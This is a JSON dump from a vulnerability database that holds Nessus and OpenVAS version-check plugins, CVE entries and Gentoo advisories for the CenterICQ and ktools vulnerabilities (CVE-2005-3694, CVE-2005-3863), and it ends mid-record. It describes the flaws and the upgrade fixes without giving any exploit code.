script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/12/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/12/30\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/11/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-im/centericq\", unaffected:make_list(\"ge 4.21.0-r2\"), vulnerable:make_list(\"lt 4.21.0-r2\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"CenterICQ\");\n}\n", "title": "GLSA-200512-11 : CenterICQ: Multiple vulnerabilities", "type": "nessus", "viewCount": 0}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2018-08-11T09:35:47"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:centericq"], "cvelist": ["CVE-2005-3863", "CVE-2005-3694"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "The remote host is affected by the vulnerability described in GLSA-200512-11 (CenterICQ: Multiple vulnerabilities)\n\n Gentoo developer Wernfried Haas discovered that when the 'Enable peer-to-peer communications' option is enabled, CenterICQ opens a port that insufficiently validates whatever is sent to it. Furthermore, Zone-H Research reported a buffer overflow in the ktools library.\n Impact :\n\n A remote attacker could cause a crash of CenterICQ by sending packets to the peer-to-peer communications port, and potentially cause the execution of arbitrary code by enticing a CenterICQ user to edit overly long contact details.\n Workaround :\n\n There is no known workaround at this time.", "edition": 4, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "6379454bfadd51a9efec480c3397ec3e27caa864d79261d2225d13dcc6692223", "hashmap": [{"hash": "7e65482599b83fc15ece589648b06866", "key": "cvelist"}, {"hash": "9c6fe61712654f56360b12011e3de300", "key": "modified"}, {"hash": "6d0515ee016b9d3727c3147cf4a384b0", "key": "references"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "a249ff272a04bd91cb5626e5a7f1e171", "key": "cpe"}, {"hash": "e138b9d07bbf3c2599258a9f8ba3765e", "key": "published"}, {"hash": "2693b86d477bff5ce5a0f6221e137f0d", "key": "pluginID"}, {"hash": "96011a0ab24b3b296fc200b97cec2eb2", "key": "sourceData"}, {"hash": "0e58ae5ac6f7e085794e2313622ce2d9", "key": "description"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "1078098c5bd5e74513961f5758cc5914", "key": "title"}, {"hash": "99cd0c74dac24ed460ccddb58e649ac1", "key": "href"}, {"hash": "cf18d881f0f76f23f322ed3f861d3616", "key": "naslFamily"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=20352", "id": "GENTOO_GLSA-200512-11.NASL", "lastseen": "2018-08-30T19:57:08", "modified": "2018-08-10T00:00:00", "naslFamily": "Gentoo Local Security Checks", "objectVersion": "1.3", "pluginID": "20352", "published": "2005-12-30T00:00:00", "references": ["http://www.zone-h.org/en/advisories/read/id=8480/", "https://security.gentoo.org/glsa/200512-11"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200512-11.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(20352);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/08/10 18:07:06\");\n\n script_cve_id(\"CVE-2005-3694\", \"CVE-2005-3863\");\n script_xref(name:\"GLSA\", value:\"200512-11\");\n\n script_name(english:\"GLSA-200512-11 : CenterICQ: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200512-11\n(CenterICQ: Multiple vulnerabilities)\n\n Gentoo developer Wernfried Haas discovered that when the 'Enable\n peer-to-peer communications' option is enabled, CenterICQ opens a port\n that insufficiently validates whatever is sent to it. Furthermore,\n Zone-H Research reported a buffer overflow in the ktools library.\n \nImpact :\n\n A remote attacker could cause a crash of CenterICQ by sending\n packets to the peer-to-peer communications port, and potentially cause\n the execution of arbitrary code by enticing a CenterICQ user to edit\n overly long contact details.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.zone-h.org/en/advisories/read/id=8480/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200512-11\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All CenterICQ users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-im/centericq-4.21.0-r2'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:centericq\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/12/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/12/30\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/11/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-im/centericq\", unaffected:make_list(\"ge 4.21.0-r2\"), vulnerable:make_list(\"lt 4.21.0-r2\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"CenterICQ\");\n}\n", "title": "GLSA-200512-11 : CenterICQ: Multiple vulnerabilities", "type": "nessus", "viewCount": 0}, "differentElements": ["cvss"], "edition": 4, "lastseen": "2018-08-30T19:57:08"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:centericq"], "cvelist": ["CVE-2005-3863", "CVE-2005-3694"], "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "description": "The remote host is affected by the vulnerability described in GLSA-200512-11\n(CenterICQ: Multiple vulnerabilities)\n\n Gentoo developer Wernfried Haas discovered that when the 'Enable\n peer-to-peer communications' option is enabled, CenterICQ opens a port\n that insufficiently validates whatever is sent to it. Furthermore,\n Zone-H Research reported a buffer overflow in the ktools library.\nImpact :\n\n A remote attacker could cause a crash of CenterICQ by sending\n packets to the peer-to-peer communications port, and potentially cause\n the execution of arbitrary code by enticing a CenterICQ user to edit\n overly long contact details.\nWorkaround :\n\n There is no known workaround at this time.", "edition": 6, "enchantments": {"dependencies": {"modified": "2019-01-16T20:06:25", "references": [{"idList": ["SECURITYVULNS:DOC:12899"], "type": "securityvulns"}, {"idList": ["OPENVAS:56068", "OPENVAS:55942", "OPENVAS:57877", "OPENVAS:56853", "OPENVAS:56858"], "type": "openvas"}, {"idList": ["CVE-2005-3863", "CVE-2005-3694"], "type": "cve"}, {"idList": ["DEBIAN_DSA-1083.NASL", "DEBIAN_DSA-1088.NASL", "DEBIAN_DSA-912.NASL", "GENTOO_GLSA-200608-27.NASL"], "type": "nessus"}, {"idList": ["GLSA-200512-11", "GLSA-200608-27"], "type": "gentoo"}, {"idList": ["EDB-ID:26666"], "type": "exploitdb"}, {"idList": ["OSVDB:21270", "OSVDB:21161"], "type": "osvdb"}, {"idList": ["DEBIAN:DSA-1083-1:D90D3", "DEBIAN:DSA-912-1:F505A", "DEBIAN:DSA-1088-1:6BA4D"], "type": "debian"}]}, "score": {"value": 7.5, "vector": "NONE"}}, "hash": "80fda83891b1ee0898c86fd4c83168e6e70290eb82993b58bce018ce38a466b5", "hashmap": [{"hash": "7e65482599b83fc15ece589648b06866", "key": "cvelist"}, {"hash": "9c6fe61712654f56360b12011e3de300", "key": "modified"}, {"hash": "ed3111898fb94205e2b64cefef5a2081", "key": "cvss"}, {"hash": "6d0515ee016b9d3727c3147cf4a384b0", "key": "references"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "a249ff272a04bd91cb5626e5a7f1e171", "key": "cpe"}, {"hash": "e138b9d07bbf3c2599258a9f8ba3765e", "key": "published"}, {"hash": "2693b86d477bff5ce5a0f6221e137f0d", "key": "pluginID"}, {"hash": "96011a0ab24b3b296fc200b97cec2eb2", "key": "sourceData"}, {"hash": "e63f8874dc1d717f95ba87fb42217b81", "key": "description"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "1078098c5bd5e74513961f5758cc5914", "key": "title"}, {"hash": "99cd0c74dac24ed460ccddb58e649ac1", "key": "href"}, {"hash": "cf18d881f0f76f23f322ed3f861d3616", "key": "naslFamily"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=20352", "id": "GENTOO_GLSA-200512-11.NASL", "lastseen": "2019-01-16T20:06:25", "modified": "2018-08-10T00:00:00", "naslFamily": "Gentoo Local Security Checks", "objectVersion": "1.3", "pluginID": "20352", "published": "2005-12-30T00:00:00", "references": ["http://www.zone-h.org/en/advisories/read/id=8480/", "https://security.gentoo.org/glsa/200512-11"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200512-11.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(20352);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/08/10 18:07:06\");\n\n script_cve_id(\"CVE-2005-3694\", \"CVE-2005-3863\");\n script_xref(name:\"GLSA\", value:\"200512-11\");\n\n script_name(english:\"GLSA-200512-11 : CenterICQ: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200512-11\n(CenterICQ: Multiple vulnerabilities)\n\n Gentoo developer Wernfried Haas discovered that when the 'Enable\n peer-to-peer communications' option is enabled, CenterICQ opens a port\n that insufficiently validates whatever is sent to it. Furthermore,\n Zone-H Research reported a buffer overflow in the ktools library.\n \nImpact :\n\n A remote attacker could cause a crash of CenterICQ by sending\n packets to the peer-to-peer communications port, and potentially cause\n the execution of arbitrary code by enticing a CenterICQ user to edit\n overly long contact details.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.zone-h.org/en/advisories/read/id=8480/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200512-11\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All CenterICQ users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-im/centericq-4.21.0-r2'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:centericq\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/12/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/12/30\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/11/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-im/centericq\", unaffected:make_list(\"ge 4.21.0-r2\"), vulnerable:make_list(\"lt 4.21.0-r2\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"CenterICQ\");\n}\n", "title": "GLSA-200512-11 : CenterICQ: Multiple vulnerabilities", "type": "nessus", "viewCount": 0}, "differentElements": ["description"], "edition": 6, "lastseen": "2019-01-16T20:06:25"}], "edition": 7, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "a249ff272a04bd91cb5626e5a7f1e171"}, {"key": "cvelist", "hash": "7e65482599b83fc15ece589648b06866"}, {"key": "cvss", "hash": "ed3111898fb94205e2b64cefef5a2081"}, {"key": "description", "hash": "0e58ae5ac6f7e085794e2313622ce2d9"}, {"key": "href", "hash": "99cd0c74dac24ed460ccddb58e649ac1"}, {"key": "modified", "hash": "9c6fe61712654f56360b12011e3de300"}, {"key": "naslFamily", "hash": "cf18d881f0f76f23f322ed3f861d3616"}, {"key": "pluginID", "hash": "2693b86d477bff5ce5a0f6221e137f0d"}, {"key": "published", "hash": "e138b9d07bbf3c2599258a9f8ba3765e"}, {"key": "references", "hash": "6d0515ee016b9d3727c3147cf4a384b0"}, {"key": "reporter", "hash": "9cf00d658b687f030ebe173a0528c567"}, {"key": "sourceData", "hash": "96011a0ab24b3b296fc200b97cec2eb2"}, {"key": "title", "hash": "1078098c5bd5e74513961f5758cc5914"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "85fa053598ead06829b03f8a13d424e44d407efb2bfcffe14db2899811e21df2", "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-3694", "CVE-2005-3863"]}, {"type": "gentoo", "idList": ["GLSA-200512-11", "GLSA-200608-27"]}, {"type": "openvas", "idList": ["OPENVAS:56068", "OPENVAS:55942", "OPENVAS:57877", "OPENVAS:56853", "OPENVAS:56858"]}, {"type": "nessus", "idList": ["DEBIAN_DSA-912.NASL", "GENTOO_GLSA-200608-27.NASL", "DEBIAN_DSA-1088.NASL", "DEBIAN_DSA-1083.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:12899"]}, {"type": "osvdb", "idList": ["OSVDB:21161", "OSVDB:21270"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1088-1:6BA4D", "DEBIAN:DSA-912-1:F505A", "DEBIAN:DSA-1083-1:D90D3"]}, {"type": "exploitdb", "idList": ["EDB-ID:26666"]}], "modified": "2019-02-21T01:08:53"}, "score": {"value": 7.8, "vector": "NONE", "modified": "2019-02-21T01:08:53"}, "vulnersScore": 7.8}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200512-11.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(20352);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2018/08/10 18:07:06\");\n\n script_cve_id(\"CVE-2005-3694\", \"CVE-2005-3863\");\n script_xref(name:\"GLSA\", value:\"200512-11\");\n\n script_name(english:\"GLSA-200512-11 : CenterICQ: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200512-11\n(CenterICQ: Multiple vulnerabilities)\n\n Gentoo developer Wernfried Haas discovered that when the 'Enable\n peer-to-peer communications' option is enabled, CenterICQ opens a port\n that insufficiently validates whatever is sent to it. Furthermore,\n Zone-H Research reported a buffer overflow in the ktools library.\n \nImpact :\n\n A remote attacker could cause a crash of CenterICQ by sending\n packets to the peer-to-peer communications port, and potentially cause\n the execution of arbitrary code by enticing a CenterICQ user to edit\n overly long contact details.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.zone-h.org/en/advisories/read/id=8480/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200512-11\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All CenterICQ users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-im/centericq-4.21.0-r2'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:centericq\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/12/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/12/30\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/11/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-im/centericq\", unaffected:make_list(\"ge 4.21.0-r2\"), vulnerable:make_list(\"lt 4.21.0-r2\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"CenterICQ\");\n}\n", "naslFamily": "Gentoo Local Security Checks", "pluginID": "20352", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:centericq"], "scheme": null}
{"cve": [{"lastseen": "2019-05-29T18:08:15", "bulletinFamily": "NVD", "description": "centericq 4.20.0-r3 with \"Enable peer-to-peer communications\" set allows remote attackers to cause a denial of service (segmentation fault and crash) via short zero-length packets, and possibly packets of length 1 or 2, as demonstrated using Nessus.", "modified": "2017-07-11T01:33:00", "id": "CVE-2005-3694", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3694", "published": "2005-11-20T20:03:00", "title": "CVE-2005-3694", "type": "cve", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:08:15", "bulletinFamily": "NVD", "description": "Stack-based buffer overflow in kkstrtext.h in ktools library 0.3 and earlier, as used in products such as (1) centericq, (2) orpheus, (3) motor, and (4) groan, allows local users or remote attackers to execute arbitrary code via a long parameter to the VGETSTRING macro.", "modified": "2018-10-19T15:39:00", "id": "CVE-2005-3863", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3863", "published": "2005-11-29T11:03:00", "title": "CVE-2005-3863", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:19", "bulletinFamily": "unix", "description": "### Background\n\nCenterICQ is a text-based instant messaging interface that supports multiple protocols. It includes the ktools library, which provides text-mode user interface controls. \n\n### Description\n\nGentoo developer Wernfried Haas discovered that when the \"Enable peer-to-peer communications\" option is enabled, CenterICQ opens a port that insufficiently validates whatever is sent to it. Furthermore, Zone-H Research reported a buffer overflow in the ktools library. \n\n### Impact\n\nA remote attacker could cause a crash of CenterICQ by sending packets to the peer-to-peer communications port, and potentially cause the execution of arbitrary code by enticing a CenterICQ user to edit overly long contact details. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll CenterICQ users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-im/centericq-4.21.0-r2\"", "modified": "2005-12-20T00:00:00", "published": "2005-12-20T00:00:00", "id": "GLSA-200512-11", "href": "https://security.gentoo.org/glsa/200512-11", "type": "gentoo", "title": "CenterICQ: Multiple vulnerabilities", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-06T19:47:01", "bulletinFamily": "unix", "description": "### Background\n\nMotor is a text mode based programming environment for Linux, with a syntax highlighting feature, project manager, makefile generator, gcc and gdb front-end, and CVS integration. \n\n### Description\n\nIn November 2005, Zone-H Research reported a boundary error in the ktools library in the VGETSTRING() macro of kkstrtext.h, which may cause a buffer overflow via an overly long input string. \n\n### Impact\n\nA remote attacker could entice a user to use a malicious file or input, which could lead to the crash of Motor and possibly the execution of arbitrary code. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll Motor 3.3.x users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-util/motor-3.3.0-r1\"\n\nAll motor 3.4.x users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-util/motor-3.4.0-r1\"", "modified": "2006-08-29T00:00:00", "published": "2006-08-29T00:00:00", "id": "GLSA-200608-27", "href": "https://security.gentoo.org/glsa/200608-27", "type": "gentoo", "title": "Motor: Execution of arbitrary code", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2017-07-24T12:50:14", "bulletinFamily": "scanner", "description": "The remote host is missing updates announced in\nadvisory GLSA 200512-11.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=56068", "id": "OPENVAS:56068", "title": "Gentoo Security Advisory GLSA 200512-11 (CenterICQ)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"CenterICQ is vulnerable to a Denial of Service issue, and also potentially\nto the execution of arbitrary code through an included vulnerable ktools\nlibrary.\";\ntag_solution = \"All CenterICQ users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-im/centericq-4.21.0-r2'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200512-11\nhttp://bugs.gentoo.org/show_bug.cgi?id=100519\nhttp://bugs.gentoo.org/show_bug.cgi?id=114038\nhttp://www.zone-h.org/en/advisories/read/id=8480/\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200512-11.\";\n\n \n\nif(description)\n{\n script_id(56068);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2005-3694\", \"CVE-2005-3863\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200512-11 (CenterICQ)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"net-im/centericq\", unaffected: make_list(\"ge 4.21.0-r2\"), vulnerable: make_list(\"lt 4.21.0-r2\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:49:42", "bulletinFamily": "scanner", "description": "The remote host is missing an update to centericq\nannounced via advisory DSA 912-1.\n\nWernfried Haas discovered that centericq, a text-mode multi-protocol\ninstant messenger client, can crash when it receives certain zero\nlength packets and is directly connected to 